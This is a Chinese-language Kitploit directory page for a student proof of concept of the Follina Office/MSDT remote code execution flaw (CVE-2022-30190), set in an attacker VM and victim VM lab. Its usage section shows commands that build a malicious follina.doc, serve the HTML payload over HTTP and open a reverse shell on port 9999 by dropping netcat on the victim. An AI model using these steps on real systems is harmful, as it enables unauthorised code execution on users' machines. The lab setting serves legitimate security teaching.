Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30190 — Follina(CVE-2022-30190)是最近发现的一个 Microsoft Office 零日漏洞。这是一个高严重性漏洞,黑客可利用其发起远程代码执行(RCE)攻击。 | Kitploit
工具/GitHubGitHub/aminetitrofine/cve-2022-30190
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队远程访问工具
GitHubaminetitrofine/cve-2022-30190

CVE-2022-30190

Follina(CVE-2022-30190)是最近发现的一个 Microsoft Office 零日漏洞。这是一个高严重性漏洞,黑客可利用其发起远程代码执行(RCE)攻击。

查看仓库
12613年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE 30190

Amine TITROFINE | 2022年12月17日


Follina(CVE-2022-30190)是最近发现的微软 Office 零日漏洞。这是一个高严重性漏洞,攻击者可借此发起远程代码执行(RCE)攻击。当调用应用程序(如 Word)通过 URL 协议调用 MSDT 时,就会触发该漏洞。成功利用此漏洞的攻击者可以以调用应用程序的权限运行任意代码。攻击者随后可以在用户权限允许的上下文中安装程序、查看、更改或删除数据,或创建新帐户。

环境

2 台虚拟机:

  • 攻击机
    • kali-linux-2022.3-virtualbox-amd64(下载链接)
  • 受害者机器
    • Windows 10(64 位)(下载链接)
    • Microsoft Office 2016 Pro(下载链接)

漏洞利用

root@kitploit:~
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git

$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri

$ python3 follina.py –r 9999

运行 follina.py 程序后,会生成一个(follina.doc),其中包含恶意脚本。

为了方便在两台虚拟机之间共享文件,我们将使用 Python http 服务器

root@kitploit:~
$ python3 –m http.server 8080

示例

在端口 9999 上获取反向 shell。注意,这会将一个 netcat 二进制文件下载到受害者机器上,并将其放置在 C:\Windows\Tasks 中。它不会清理该二进制文件。除非禁用防病毒软件,否则这会触发防病毒检测。

root@kitploit:~
$ python3 follina.py -r 9999

弹出 calc.exe:

root@kitploit:~
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000

弹出 notepad.exe:

root@kitploit:~
$ python3 follina.py -c "notepad"
下载工具